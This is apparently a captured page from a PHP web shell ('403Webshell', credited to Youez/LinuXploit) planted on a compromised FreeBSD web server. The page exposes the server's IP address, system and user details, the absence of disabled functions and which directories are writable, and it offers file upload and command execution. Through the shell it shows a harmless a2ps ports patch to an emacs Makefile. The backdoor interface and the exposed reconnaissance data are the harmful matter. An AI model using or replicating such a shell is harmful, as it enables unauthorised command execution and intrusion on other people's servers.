403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/print/a2ps/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/print/a2ps/files/patch-contrib-emacs-Makefile.in
--- contrib/emacs/Makefile.in.orig	2000-02-24 18:01:08 UTC
+++ contrib/emacs/Makefile.in
@@ -159,8 +159,9 @@ Makefile: $(srcdir)/Makefile.in  $(top_b
 
 install-dist_lispLISP: $(dist_lisp_LISP) $(ELCFILES)
 	@$(NORMAL_INSTALL)
-	$(mkinstalldirs) $(DESTDIR)$(lispdir)
-	@list='$(dist_lisp_LISP)'; for p in $$list; do \
+	if test $(EMACS) != no; then \
+	$(mkinstalldirs) $(DESTDIR)$(lispdir); \
+	list='$(dist_lisp_LISP)'; for p in $$list; do \
 	  if test -f "$$p"; then d= ; else d="$(srcdir)/"; fi; \
 	  f="`echo $$p | sed -e 's|^.*/||'`"; \
 	  echo " $(INSTALL_DATA) $$d$$p $(DESTDIR)$(lispdir)/$$f"; \
@@ -169,7 +170,8 @@ install-dist_lispLISP: $(dist_lisp_LISP)
 	    echo " $(INSTALL_DATA) $${p}c $(DESTDIR)$(lispdir)/$${f}c"; \
 	    $(INSTALL_DATA) $${p}c $(DESTDIR)$(lispdir)/$${f}c; \
 	  else : ; fi; \
-	done
+	done; \
+	fi
 
 uninstall-dist_lispLISP:
 	@$(NORMAL_UNINSTALL)

Youez - 2016 - github.com/yon3zu
LinuXploit